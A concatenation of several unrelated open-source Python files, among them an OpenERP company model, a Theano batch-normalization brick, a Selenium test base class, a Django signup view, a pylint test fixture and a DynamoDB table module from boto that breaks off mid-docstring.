class res_company(osv.osv):
_inherit = "res.company"
_columns = {
'expects_chart_of_accounts': fields.boolean('Expects a Chart of Accounts'),
'tax_calculation_rounding_method': fields.selection([
('round_per_line', 'Round per Line'),
('round_globally', 'Round Globally'),
], 'Tax Calculation Rounding Method',
help="If you select 'Round per Line' : for each tax, the tax amount will first be computed and rounded for each PO/SO/invoice line and then these rounded amounts will be summed, leading to the total amount for that tax. If you select 'Round Globally': for each tax, the tax amount will be computed for each PO/SO/invoice line, then these amounts will be summed and eventually this total tax amount will be rounded. If you sell with tax included, you should choose 'Round per line' because you certainly want the sum of your tax-included line subtotals to be equal to the total amount with taxes."),
'paypal_account': fields.char("Paypal Account", size=128, help="Paypal username (usually email) for receiving online payments."),
'overdue_msg': fields.text('Overdue Payments Message', translate=True),
}
_defaults = {
'expects_chart_of_accounts': True,
'tax_calculation_rounding_method': 'round_per_line',
'overdue_msg': '''Dear Sir/Madam,
Our records indicate that some payments on your account are still due. Please find details below.
If the amount has already been paid, please disregard this notice. Otherwise, please forward us the total amount stated below.
If you have any queries regarding your account, Please contact us.
Thank you in advance for your cooperation.
Best Regards,'''
}
res_company()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
lukemetz/cuboid | cuboid/bricks/batch_norm.py | 1 | 10524 | from blocks.main_loop import MainLoop
from blocks.algorithms import TrainingAlgorithm
from blocks.roles import add_role, AuxiliaryRole
import numpy as np
from blocks.bricks.base import Brick, lazy, application
from blocks.config import config
from blocks.utils import shared_floatx_nans
from blocks.roles import WEIGHT, BIAS
from blocks.initialization import Constant
from theano import tensor as T
from blocks.filter import VariableFilter, get_brick
from blocks.utils import dict_union
from blocks.graph import add_annotation, Annotation
from blocks.filter import get_application_call
import theano
import logging
from collections import OrderedDict
from cuboid.graph import get_parameter_name
from blocks.extensions import FinishAfter, ProgressBar
logger = logging.getLogger(__name__)
class BatchNormPopulationRole(AuxiliaryRole):
pass
#: Variable for batchnorm populations
BATCHNORM_POPULATION = BatchNormPopulationRole()
class BatchNormalization(Brick):
seed_rng = np.random.RandomState(config.default_seed)
@lazy(allocation=['input_dim'])
def __init__(self, input_dim, epsilon=1e-8, use_population=False,
rolling_accumulate=False, accumulate=False, alpha=0.99, **kwargs):
super(BatchNormalization, self).__init__(**kwargs)
self.input_dim = input_dim
self.use_population = use_population
self.e = epsilon
self.accumulate = accumulate
self.rolling_accumulate = rolling_accumulate
self.alpha = alpha
@property
def seed(self):
if getattr(self, '_seed', None) is not None:
return self._seed
else:
self._seed = self.seed_rng.randint(np.iinfo(np.int32).max)
return self._seed
@seed.setter
def seed(self, value):
if hasattr(self, '_seed'):
raise AttributeError("seed already set")
self._seed = value
@property
def rng(self):
if getattr(self, '_rng', None) is not None:
return self._rng
else:
return np.random.RandomState(self.seed)
@rng.setter
def rng(self, rng):
self._rng = rng
@property
def naxes(self):
if isinstance(self.input_dim, int):
return 2
else:
return len(self.input_dim) + 1
def _allocate(self):
naxes = self.naxes
if naxes == 2:
dim = self.input_dim
elif naxes == 4:
dim = self.input_dim[0]
elif naxes == 3:
dim = self.input_dim[-1]
else:
raise NotImplementedError
self.g = shared_floatx_nans((dim, ), name='g')
self.b = shared_floatx_nans((dim, ), name='b')
add_role(self.g, WEIGHT)
add_role(self.b, BIAS)
self.parameters = [self.g, self.b]
# parameters for inference
self.u = shared_floatx_nans((dim, ), name='u')
self.s = shared_floatx_nans((dim, ), name='s')
self.n = shared_floatx_nans((1,), name='n')
self.add_auxiliary_variable(self.u, roles=[BATCHNORM_POPULATION])
self.add_auxiliary_variable(self.s, roles=[BATCHNORM_POPULATION])
self.add_auxiliary_variable(self.n, roles=[BATCHNORM_POPULATION])
def _initialize(self):
Constant(1).initialize(self.g, self.rng)
Constant(0).initialize(self.b, self.rng)
Constant(0).initialize(self.u, self.rng)
Constant(0).initialize(self.s, self.rng)
Constant(0).initialize(self.n, self.rng)
@application(inputs=['input_'], outputs=['output'])
def apply(self, input_, **kwargs):
output, u, s = self.do_apply(input_, **kwargs)
if self.accumulate:
if self.use_population:
raise Exception("use_population is set to true as well as with"
"accumulation.",
"This is not possible as there is nothing to "
"take the population of.")
self.updates[self.u] = self.u + u
self.updates[self.s] = self.s + s
self.updates[self.n] = self.n + 1
if self.rolling_accumulate:
if self.use_population:
raise Exception("use_population is set to true as well as with"
"rolling_accumulation."
"This is not currently supported, "
" and might not make sense.")
annotation = get_application_call(output)
annotation.updates[self.u] = self.u * self.alpha + (1-self.alpha) * u
annotation.updates[self.s] = self.s * self.alpha + (1-self.alpha) * s
annotation.updates[self.n] = self.n*0 + 1
return output
@application(inputs=['input_'], outputs=['output', 'u', 's'])
def do_apply(self, input_):
X = input_
naxes = self.naxes
broadcast_n = T.addbroadcast(self.n, 0)
if naxes == 4: # CNN
if self.use_population:
u = self.u/broadcast_n
else:
u = T.mean(X, axis=[0, 2, 3])
b_u = u.dimshuffle('x', 0, 'x', 'x')
if self.use_population:
s = self.s/broadcast_n
else:
s = T.mean(T.sqr(X - b_u), axis=[0, 2, 3])
X = (X - b_u) / T.sqrt(s.dimshuffle('x', 0, 'x', 'x') + self.e)
X = self.g.dimshuffle('x', 0, 'x', 'x')*X +\
self.b.dimshuffle('x', 0, 'x', 'x')
elif naxes == 3: # RNN
if self.use_population:
u = self.u/broadcast_n
else:
u = T.mean(X, axis=[0, 1])
b_u = u.dimshuffle('x', 'x', 0)
if self.use_population:
s = self.s/broadcast_n
else:
s = T.mean(T.sqr(X - b_u), axis=[0, 1])
X = (X - b_u) / T.sqrt(s.dimshuffle('x', 'x', 0) + self.e)
X = self.g.dimshuffle('x', 'x', 0)*X +\
self.b.dimshuffle('x', 'x', 0)
elif naxes == 2: # FC
if self.use_population:
u = self.u/broadcast_n
else:
u = T.mean(X, axis=0)
if self.use_population:
s = self.s/broadcast_n
else:
s = T.mean(T.sqr(X - u), axis=0)
X = (X - u) / T.sqrt(s + self.e)
X = self.g*X + self.b
else:
raise NotImplementedError
return X, u, s
def get_dim(self, name):
if name == "input_" or name == "output":
return self.input_dim
else:
return super(BatchNormalization, self).get_dim(name)
class BatchNormAccumulate(TrainingAlgorithm):
""" TrainingAlgorithm that accumulates batchnorm parameters
"""
def __init__(self, cg):
self.cg = cg
self.parameters = get_batchnorm_parameters(cg)
self.inputs = cg.inputs
self._input_names = [i.name for i in self.inputs]
def initialize(self, **kwargs):
logger.info("BatchNormAccumulate initializing")
# get list of bricks
bricks_seen = set()
for p in self.parameters:
brick = get_brick(p)
if brick not in bricks_seen:
bricks_seen.add(brick)
# ensure all updates account for all bricks
update_parameters = set()
for b in bricks_seen:
for var, update in b.updates.items():
update_parameters.add(var)
assert b.n.get_value() == 0
if set(update_parameters) != set(self.parameters):
raise ValueError("The updates and the parameters passed in do "
"not match. This could be due to no applications "
"or multiple applications found %d updates, and "
"%d parameters" % (len(update_parameters),
len(self.parameters)))
updates = dict_union(*[b.updates for b in bricks_seen])
logger.info("Compiling BatchNorm accumulate")
self._func = theano.function(self.inputs, [], updates=updates,
on_unused_input="warn")
super(BatchNormAccumulate, self).initialize(**kwargs)
def process_batch(self, batch):
if not set(self._input_names).issubset((batch.keys())):
raise ValueError("Invalid batch. Got sources: (%s), expected "
"sources: (%s)" % (str(batch.keys()),
str(self._input_names)))
ordered_batch = [batch[v.name] for v in self.inputs]
self._func(*ordered_batch)
def get_batchnorm_parameters(cg):
""" Get the parameters marked with BATCHNORM_POPULATION
Parameters
---------
cg: `blocks.graph.ComputationGraph`
computation graph to look through
Returns
-------
variables: list
list of variables
"""
return VariableFilter(roles=[BATCHNORM_POPULATION])(cg.auxiliary_variables)
def infer_population(data_stream, model, n_batches):
""" Sets the population parameters for a given model"""
# construct a main loop with algorithm
algorithm = BatchNormAccumulate(model)
main_loop = MainLoop(
algorithm=algorithm,
data_stream=data_stream,
model=model,
extensions=[FinishAfter(after_n_batches=n_batches), ProgressBar()])
main_loop.run()
parameters = get_batchnorm_parameters(model)
batchnorm_bricks = set([get_brick(p) for p in parameters])
for b in batchnorm_bricks:
b.use_population = True
def get_batchnorm_parameter_dict(model):
parameters = get_batchnorm_parameters(model)
parameters_dict = OrderedDict()
for p in parameters:
name = get_parameter_name(p)
parameters_dict[name] = p
return parameters_dict
def get_batchnorm_parameter_values(model):
bn_dict = get_batchnorm_parameter_dict(model)
return {k: v.get_value() for k, v in bn_dict.items()}
def set_batchnorm_parameter_values(model, values_dict):
bn_dict = get_batchnorm_parameter_dict(model)
unknown = set(values_dict) - set(bn_dict)
missing = set(bn_dict) - set(values_dict)
if len(unknown):
logger.error("unknown parameter names: {}\n".format(unknown))
if len(missing):
logger.error("missing values for parameters: {}\n".format(missing))
for name, v in bn_dict.items():
v.set_value(values_dict[name])
| mit |
datacommonsorg/website | server/webdriver_tests/base_test.py | 1 | 3177 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from flask_testing import LiveServerTestCase
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from main import app
from os import environ
# Read flag from OS' environment.
# TODO(edumorales): Figure out a way to pass down an argument using Pytest.
PYTEST_PARALLEL = environ.get("PYTEST_PARALLEL")
DEFAULT_HEIGHT = 1200
DEFAULT_WIDTH = 1200
# Base test class to setup the server.
# Please refer to README.md to see the order of method execution during test.
class WebdriverBaseTest(LiveServerTestCase):
def create_app(self):
"""Returns the Flask Server running Data Commons."""
app_instance = app
# Each test will start its own Flask Server.
# Port 0 is used to let Flask pick any available port.
# If no port is specified, port 5000 will be used for all tests which
# may cause some racing issue when running tests.
app_instance.config['LIVESERVER_PORT'] = 0
return app_instance
def setUp(self):
"""Runs at the beginning of every individual test."""
# These options are needed to run ChromeDriver inside a Docker without a UI.
chrome_options = Options()
chrome_options.add_argument('--headless')
chrome_options.add_argument('--no-sandbox')
chrome_options.add_argument('--disable-dev-shm-usage')
# Maximum time, in seconds, before throwing a TimeoutException.
self.TIMEOUT_SEC = 60
# If flag is enabled, connect to Selenium Grid.
if PYTEST_PARALLEL:
# Connect to port 4444, where Selenium Grid is running.
# Tell Selenium Grid you need a new ChromeDriver instance.
# Selenium Grid will be in charge of keeping track of all the ChromeDriver instances.
self.driver = webdriver.Remote(
command_executor="http://0.0.0.0:4444/wd/hub",
desired_capabilities=webdriver.DesiredCapabilities.CHROME,
options=chrome_options)
# Otherwise, start a simple WebDriver instance.
else:
self.driver = webdriver.Chrome(options=chrome_options)
# Set a reliable window size for all tests (can be overwritten though)
self.driver.set_window_size(DEFAULT_WIDTH, DEFAULT_HEIGHT)
# The URL of the Data Commons server.
self.url_ = self.get_server_url()
def tearDown(self):
"""Runs at the end of every individual test."""
# Quit the ChromeDriver instance.
# NOTE: Every individual test starts a new ChromeDriver instance.
self.driver.quit()
| apache-2.0 |
gdetrez/MyConf | apps/signup/views.py | 1 | 1334 | from django.forms import ModelForm
from signup.models import SessionSignup
from schedule.models import Session
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render_to_response, get_object_or_404
from django.template import loader, RequestContext
from django.forms.widgets import HiddenInput
# Create your views here.
class SignupForm(ModelForm):
class Meta:
model = SessionSignup
widgets = {
'session': HiddenInput()
}
class Media:
css = {
'all': ('style/forms.css',)
}
def signup(request, session_pk):
session = get_object_or_404(Session, pk=session_pk)
if request.method == 'POST': # If the form has been submitted...
form = SignupForm(request.POST) # A form bound to the POST data
if form.is_valid(): # All validation rules pass
form.save()
return HttpResponseRedirect(session.get_absolute_url() + "?signedup=ok") # Redirect after POST
else:
s = SessionSignup(session=session)
form = SignupForm(instance = s) # An unbound form
t = loader.get_template('schedule/session_signup.djhtml')
c = RequestContext(request,{
'form': form,
'session': session
})
return HttpResponse(t.render(c))
| agpl-3.0 |
lucidmotifs/auto-aoc | .venv/lib/python3.5/site-packages/pylint/test/functional/invalid_sequence_index.py | 5 | 7143 | """Errors for invalid sequence indices"""
# pylint: disable=too-few-public-methods, no-self-use, import-error, missing-docstring
import six
from unknown import Unknown
TESTLIST = [1, 2, 3]
TESTTUPLE = (1, 2, 3)
TESTSTR = '123'
# getitem tests with bad indices
def function1():
"""list index is a function"""
return TESTLIST[id] # [invalid-sequence-index]
def function2():
"""list index is None"""
return TESTLIST[None] # [invalid-sequence-index]
def function3():
"""list index is a float expression"""
return TESTLIST[float(0)] # [invalid-sequence-index]
def function4():
"""list index is a str constant"""
return TESTLIST['0'] # [invalid-sequence-index]
def function5():
"""list index does not implement __index__"""
class NonIndexType(object):
"""Class without __index__ method"""
pass
return TESTLIST[NonIndexType()] # [invalid-sequence-index]
def function6():
"""Tuple index is None"""
return TESTTUPLE[None] # [invalid-sequence-index]
def function7():
"""String index is None"""
return TESTSTR[None] # [invalid-sequence-index]
def function8():
"""Index of subclass of tuple is None"""
class TupleTest(tuple):
"""Subclass of tuple"""
pass
return TupleTest()[None] # [invalid-sequence-index]
# getitem tests with good indices
def function9():
"""list index is an int constant"""
return TESTLIST[0] # no error
def function10():
"""list index is a integer expression"""
return TESTLIST[int(0.0)] # no error
def function11():
"""list index is a slice"""
return TESTLIST[slice(1, 2, 3)] # no error
def function12():
"""list index implements __index__"""
class IndexType(object):
"""Class with __index__ method"""
def __index__(self):
"""Allow objects of this class to be used as slice indices"""
return 0
return TESTLIST[IndexType()] # no error
def function13():
"""list index implements __index__ in a superclass"""
class IndexType(object):
"""Class with __index__ method"""
def __index__(self):
"""Allow objects of this class to be used as slice indices"""
return 0
class IndexSubType(IndexType):
"""Class with __index__ in parent"""
pass
return TESTLIST[IndexSubType()] # no error
def function14():
"""Tuple index is an int constant"""
return TESTTUPLE[0]
def function15():
"""String index is an int constant"""
return TESTSTR[0]
def function16():
"""Index of subclass of tuple is an int constant"""
class TupleTest(tuple):
"""Subclass of tuple"""
pass
return TupleTest()[0] # no error
def function17():
"""Index of subclass of tuple with custom __getitem__ is None"""
class TupleTest(tuple):
"""Subclass of tuple with custom __getitem__"""
def __getitem__(self, index):
"""Allow non-integer indices"""
return 0
return TupleTest()[None] # no error
def function18():
"""Index of subclass of tuple with __getitem__ in superclass is None"""
class TupleTest(tuple):
"""Subclass of tuple with custom __getitem__"""
def __getitem__(self, index):
"""Allow non-integer indices"""
return 0
class SubTupleTest(TupleTest):
"""Subclass of a subclass of tuple"""
pass
return SubTupleTest()[None] # no error
# Test with set and delete statements
def function19():
"""Set with None and integer indices"""
TESTLIST[None] = 0 # [invalid-sequence-index]
TESTLIST[0] = 0 # no error
def function20():
"""Delete with None and integer indicies"""
del TESTLIST[None] # [invalid-sequence-index]
del TESTLIST[0] # no error
def function21():
"""Set and delete on a subclass of list"""
class ListTest(list):
"""Inherit all list get/set/del handlers"""
pass
test = ListTest()
# Set and delete with invalid indices
test[None] = 0 # [invalid-sequence-index]
del test[None] # [invalid-sequence-index]
# Set and delete with valid indices
test[0] = 0 # no error
del test[0] # no error
def function22():
"""Get, set, and delete on a subclass of list that overrides __setitem__"""
class ListTest(list):
"""Override setitem but not get or del"""
def __setitem__(self, key, value):
pass
test = ListTest()
# failure on the getitem with None
test[None][0] = 0 # [invalid-sequence-index]
# failure on the getitem with None
del test[None] # [invalid-sequence-index]
test[0][0] = 0 # getitem with int and setitem with int, no error
test[None] = 0 # setitem overridden, no error
test[0] = 0 # setitem with int, no error
del test[0] # delitem with int, no error
def function23():
"""Get, set, and delete on a subclass of list that overrides __delitem__"""
class ListTest(list):
"""Override delitem but not get or set"""
def __delitem__(self, key):
pass
test = ListTest()
# failure on the getitem with None
test[None][0] = 0 # [invalid-sequence-index]
# setitem with invalid index
test[None] = 0 # [invalid-sequence-index]
test[0][0] = 0 # getitem with int and setitem with int, no error
test[0] = 0 # setitem with int, no error
del test[None] # delitem overridden, no error
del test[0] # delitem with int, no error
def function24():
"""Get, set, and delete on a subclass of list that overrides __getitem__"""
class ListTest(list):
"""Override gelitem but not del or set"""
def __getitem__(self, key):
pass
test = ListTest()
# setitem with invalid index
test[None] = 0 # [invalid-sequence-index]
# delitem with invalid index
del test[None] # [invalid-sequence-index]
test[None][0] = 0 # getitem overridden, no error
test[0][0] = 0 # getitem with int and setitem with int, no error
test[0] = 0 # setitem with int, no error
del test[0] # delitem with int, no error
# Teest ExtSlice usage
def function25():
"""Extended slice used with a list"""
return TESTLIST[..., 0] # [invalid-sequence-index]
def function26():
"""Extended slice used with an object that implements __getitem__"""
class ExtSliceTest(object):
"""Permit extslice syntax by implementing __getitem__"""
def __getitem__(self, index):
return 0
return ExtSliceTest()[..., 0] # no error
def function27():
"""Don't warn in the case where the indexed object has unknown base classes."""
class UnknownBase(Unknown):
pass
slices = UnknownBase["aaaa"] + UnknownBase()[object]
ext_slices = UnknownBase[..., 0] + UnknownBase()[..., 0]
return slices, ext_slices
def function28():
"""Don't emit for classes with the right implementation."""
class Meta(type):
def __getitem__(cls, arg):
return 24
@six.add_metaclass(Meta)
class Works(object):
pass
@six.add_metaclass(Meta)
class Error(list):
pass
return Works['hello'] + Error['hello']
| mit |
yg257/Pangea | lib/boto-2.34.0/boto/dynamodb/table.py | 153 | 21808 | # Copyright (c) 2012 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2012 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
from boto.dynamodb.batch import BatchList
from boto.dynamodb.schema import Schema
from boto.dynamodb.item import Item
from boto.dynamodb import exceptions as dynamodb_exceptions
import time
class TableBatchGenerator(object):
"""
A low-level generator used to page through results from
batch_get_item operations.
:ivar consumed_units: An integer that holds the number of
ConsumedCapacityUnits accumulated thus far for this
generator.
"""
def __init__(self, table, keys, attributes_to_get=None,
consistent_read=False):
self.table = table
self.keys = keys
self.consumed_units = 0
self.attributes_to_get = attributes_to_get
self.consistent_read = consistent_read
def _queue_unprocessed(self, res):
if u'UnprocessedKeys' not in res:
return
if self.table.name not in res[u'UnprocessedKeys']:
return
keys = res[u'UnprocessedKeys'][self.table.name][u'Keys']
for key in keys:
h = key[u'HashKeyElement']
r = key[u'RangeKeyElement'] if u'RangeKeyElement' in key else None
self.keys.append((h, r))
def __iter__(self):
while self.keys:
# Build the next batch
batch = BatchList(self.table.layer2)
batch.add_batch(self.table, self.keys[:100],
self.attributes_to_get)
res = batch.submit()
# parse the results
if self.table.name not in res[u'Responses']:
continue
self.consumed_units += res[u'Responses'][self.table.name][u'ConsumedCapacityUnits']
for elem in res[u'Responses'][self.table.name][u'Items']:
yield elem
# re-queue un processed keys
self.keys = self.keys[100:]
self._queue_unprocessed(res)
class Table(object):
"""
An Amazon DynamoDB table.
:ivar name: The name of the table.
:ivar create_time: The date and time that the table was created.
:ivar status: The current status of the table. One of:
'ACTIVE', 'UPDATING', 'DELETING'.
:ivar schema: A :class:`boto.dynamodb.schema.Schema` object representing
the schema defined for the table.
:ivar item_count: The number of items in the table. This value is
set only when the Table object is created or refreshed and
may not reflect the actual count.
:ivar size_bytes: Total size of the specified table, in bytes.
Amazon DynamoDB updates this value approximately every six hours.
Recent changes might not be reflected in this value.
:ivar read_units: The ReadCapacityUnits of the tables
Provisioned Throughput.
:ivar write_units: The WriteCapacityUnits of the tables
Provisioned Throughput.
:ivar schema: The Schema object associated with the table.
"""
def __init__(self, layer2, response):
"""
:type layer2: :class:`boto.dynamodb.layer2.Layer2`
:param layer2: A `Layer2` api object.
:type response: dict
:param response: The output of
`boto.dynamodb.layer1.Layer1.describe_table`.
"""
self.layer2 = layer2
self._dict = {}
self.update_from_response(response)
@classmethod
def create_from_schema(cls, layer2, name, schema):
"""Create a Table object.
If you know the name and schema of your table, you can
create a ``Table`` object without having to make any
API calls (normally an API call is made to retrieve
the schema of a table).
Example usage::
table = Table.create_from_schema(
boto.connect_dynamodb(),
'tablename',
Schema.create(hash_key=('keyname', 'N')))
:type layer2: :class:`boto.dynamodb.layer2.Layer2`
:param layer2: A ``Layer2`` api object.
:type name: str
:param name: The name of the table.
:type schema: :class:`boto.dynamodb.schema.Schema`
:param schema: The schema associated with the table.
:rtype: :class:`boto.dynamodb.table.Table`
:return: A Table object representing the table.
"""
table = cls(layer2, {'Table': {'TableName': name}})
table._schema = schema
return table
def __repr__(self):
return 'Table(%s)' % self.name
@property
def name(self):
return self._dict['TableName']
@property
def create_time(self):
return self._dict.get('CreationDateTime', None)
@property
def status(self):
return self._dict.get('TableStatus', None)
@property
def item_count(self):
return self._dict.get('ItemCount', 0)
@property
def size_bytes(self):
return self._dict.get('TableSizeBytes', 0)
@property
def schema(self):
return self._schema
@property
def read_units(self):
try:
return self._dict['ProvisionedThroughput']['ReadCapacityUnits']
except KeyError:
return None
@property
def write_units(self):
try:
return self._dict['ProvisionedThroughput']['WriteCapacityUnits']
except KeyError:
return None
def update_from_response(self, response):
"""
Update the state of the Table object based on the response
data received from Amazon DynamoDB.
"""
# 'Table' is from a describe_table call.
if 'Table' in response:
self._dict.update(response['Table'])
# 'TableDescription' is from a create_table call.
elif 'TableDescription' in response:
self._dict.update(response['TableDescription'])
if 'KeySchema' in self._dict:
self._schema = Schema(self._dict['KeySchema'])
def refresh(self, wait_for_active=False, retry_seconds=5):
"""
Refresh all of the fields of the Table object by calling
the underlying DescribeTable request.
:type wait_for_active: bool
:param wait_for_active: If True, this command will not return
until the table status, as returned from Amazon DynamoDB, is
'ACTIVE'.
:type retry_seconds: int
:param retry_seconds: If wait_for_active is True, this
parameter controls the number of seconds of delay between
calls to update_table in Amazon DynamoDB. Default is 5 seconds.
"""
done = False
while not done:
response = self.layer2.describe_table(self.name)
self.update_from_response(response)
if wait_for_active:
if self.status == 'ACTIVE':
done = True
else:
time.sleep(retry_seconds)
else:
done = True
def update_throughput(self, read_units, write_units):
"""
Update the ProvisionedThroughput for the Amazon DynamoDB Table.
:type read_units: int
:param read_units: The new value for ReadCapacityUnits.
:type write_units: int
:param write_units: The new value for WriteCapacityUnits.
"""
self.layer2.update_throughput(self, read_units, write_units)
def delete(self):
"""
Delete this table and all items in it. After calling this
the Table objects status attribute will be set to 'DELETING'.
"""
self.layer2.delete_table(self)
def get_item(self, hash_key, range_key=None,
attributes_to_get=None, consistent_read=False,
item_class=Item):
"""
Retrieve an existing item from the table.
:type hash_key: int|long|float|str|unicode|Binary
:param hash_key: The HashKey of the requested item. The
type of the value must match the type defined in the
schema for the table.
:type range_key: int|long|float|str|unicode|Binary
:param range_key: The optional RangeKey of the requested item.
The type of the value must match the type defined in the
schema for the table.
:type attributes_to_get: list
:param attributes_to_get: A list of attribute names.
If supplied, only the specified attribute names will
be returned. Otherwise, all attributes will be returned.
:type consistent_read: bool
:param consistent_read: If True, a consistent read
request is issued. Otherwise, an eventually consistent
request is issued.
:type item_class: Class
:param item_class: Allows you to override the class used
to generate the items. This should be a subclass of
:class:`boto.dynamodb.item.Item`
"""
return self.layer2.get_item(self, hash_key, range_key,
attributes_to_get, consistent_read,
item_class)
lookup = get_item
def has_item(self, hash_key, range_key=None, consistent_read=False):
"""
Checks the table to see if the Item with the specified ``hash_key``
exists. This may save a tiny bit of time/bandwidth over a
straight :py:meth:`get_item` if you have no intention to touch
the data that is returned, since this method specifically tells
Amazon not to return anything but the Item's key.
:type hash_key: int|long|float|str|unicode|Binary
:param hash_key: The HashKey of the requested item. The
type of the value must match the type defined in the
schema for the table.
:type range_key: int|long|float|str|unicode|Binary
:param range_key: The optional RangeKey of the requested item.
The type of the value must match the type defined in the
schema for the table.
:type consistent_read: bool
:param consistent_read: If True, a consistent read
request is issued. Otherwise, an eventually consistent
request is issued.
:rtype: bool
:returns: ``True`` if the Item exists, ``False`` if not.
"""
try:
# Attempt to get the key. If it can't be found, it'll raise
# an exception.
self.get_item(hash_key, range_key=range_key,
# This minimizes the size of the response body.
attributes_to_get=[hash_key],
consistent_read=consistent_read)
except dynamodb_exceptions.DynamoDBKeyNotFoundError:
# Key doesn't exist.
return False
return True
def new_item(self, hash_key=None, range_key=None, attrs=None,
item_class=Item):
"""
Return an new, unsaved Item which can later be PUT to
Amazon DynamoDB.
This method has explicit (but optional) parameters for
the hash_key and range_key values of the item. You can use
these explicit parameters when calling the method, such as::
>>> my_item = my_table.new_item(hash_key='a', range_key=1,
attrs={'key1': 'val1', 'key2': 'val2'})
>>> my_item
{u'bar': 1, u'foo': 'a', 'key1': 'val1', 'key2': 'val2'}
Or, if you prefer, you can simply put the hash_key and range_key
in the attrs dictionary itself, like this::
>>> attrs = {'foo': 'a', 'bar': 1, 'key1': 'val1', 'key2': 'val2'}
>>> my_item = my_table.new_item(attrs=attrs)
>>> my_item
{u'bar': 1, u'foo': 'a', 'key1': 'val1', 'key2': 'val2'}
The effect is the same.
.. note:
The explicit parameters take priority over the values in
the attrs dict. So, if you have a hash_key or range_key
in the attrs dict and you also supply either or both using
the explicit parameters, the values in the attrs will be
ignored.
:type hash_key: int|long|float|str|unicode|Binary
:param hash_key: The HashKey of the new item. The
type of the value must match the type defined in the
schema for the table.
:type range_key: int|long|float|str|unicode|Binary
:param range_key: The optional RangeKey of the new item.
The type of the value must match the type defined in the
schema for the table.
:type attrs: dict
:param attrs: A dictionary of key value pairs used to
populate the new item.
:type item_class: Class
:param item_class: Allows you to override the class used
to generate the items. This should be a subclass of
:class:`boto.dynamodb.item.Item`
"""
return item_class(self, hash_key, range_key, attrs)
def query(self, hash_key, *args, **kw):
"""
Perform a query on the table.
:type hash_key: int|long|float|str|unicode|Binary
:param hash_key: The HashKey of the requested item. The
type of the value must match the type defined in the
schema for the table.
:type range_key_condition: :class:`boto.dynamodb.condition.Condition`
:param range_key_condition: A Condition object.
Condition object can be one of the following types:
EQ|LE|LT|GE|GT|BEGINS_WITH|BETWEEN
The only condition which expects or will accept two
values is 'BETWEEN', otherwise a single value should
be passed to the Condition constructor.
:type attributes_to_get: list
:param attributes_to_get: A list of attribute names.
If supplied, only the specified attribute names will
be returned. Otherwise, all attributes will be returned.
:type request_limit: int
:param request_limit: The maximum number of items to retrieve
from Amazon DynamoDB on each request. You may want to set
a specific request_limit based on the provisioned throughput
of your table. The default behavior is to retrieve as many
results as possible per request.
:type max_results: int
:param max_results: The maximum number of results that will
be retrieved from Amazon DynamoDB in total. For example,
if you only wanted to see the first 100 results from the
query, regardless of how many were actually available, you
could set max_results to 100 and the generator returned
from the query method will only yeild 100 results max.
:type consistent_read: bool
:param consistent_read: If True, a consistent read
request is issued. Otherwise, an eventually consistent
request is issued.
:type scan_index_forward: bool
:param scan_index_forward: Specified forward or backward
traversal of the index. Default is forward (True).
:type exclusive_start_key: list or tuple
:param exclusive_start_key: Primary key of the item from
which to continue an earlier query. This would be
provided as the LastEvaluatedKey in that query.
:type count: bool
:param count: If True, Amazon DynamoDB returns a total
number of items for the Query operation, even if the
operation has no matching items for the assigned filter.
If count is True, the actual items are not returned and
the count is accessible as the ``count`` attribute of
the returned object.
:type item_class: Class
:param item_class: Allows you to override the class used
to generate the items. This should be a subclass of
:class:`boto.dynamodb.item.Item`
"""
return self.layer2.query(self, hash_key, *args, **kw)
def scan(self, *args, **kw):
"""
Scan through this table, this is a very long
and expensive operation, and should be avoided if
at all possible.
:type scan_filter: A dict
:param scan_filter: A dictionary where the key is the
attribute name and the value is a
:class:`boto.dynamodb.condition.Condition` object.
Valid Condition objects include:
* EQ - equal (1)
* NE - not equal (1)
* LE - less than or equal (1)
* LT - less than (1)
* GE - greater than or equal (1)
* GT - greater than (1)
* NOT_NULL - attribute exists (0, use None)
* NULL - attribute does not exist (0, use None)
* CONTAINS - substring or value in list (1)
* NOT_CONTAINS - absence of substring or value in list (1)
* BEGINS_WITH - substring prefix (1)
* IN - exact match in list (N)
* BETWEEN - >= first value, <= second value (2)
:type attributes_to_get: list
:param attributes_to_get: A list of attribute names.
If supplied, only the specified attribute names will
be returned. Otherwise, all attributes will be returned.
:type request_limit: int
:param request_limit: The maximum number of items to retrieve
from Amazon DynamoDB on each request. You may want to set
a specific request_limit based on the provisioned throughput
of your table. The default behavior is to retrieve as many
results as possible per request.
:type max_results: int
:param max_results: The maximum number of results that will
be retrieved from Amazon DynamoDB in total. For example,
if you only wanted to see the first 100 results from the
query, regardless of how many were actually available, you
could set max_results to 100 and the generator returned
from the query method will only yeild 100 results max.
:type count: bool
:param count: If True, Amazon DynamoDB returns a total
number of items for the Scan operation, even if the
operation has no matching items for the assigned filter.
If count is True, the actual items are not returned and
the count is accessible as the ``count`` attribute of
the returned object.
:type exclusive_start_key: list or tuple
:param exclusive_start_key: Primary key of the item from
which to continue an earlier query. This would be
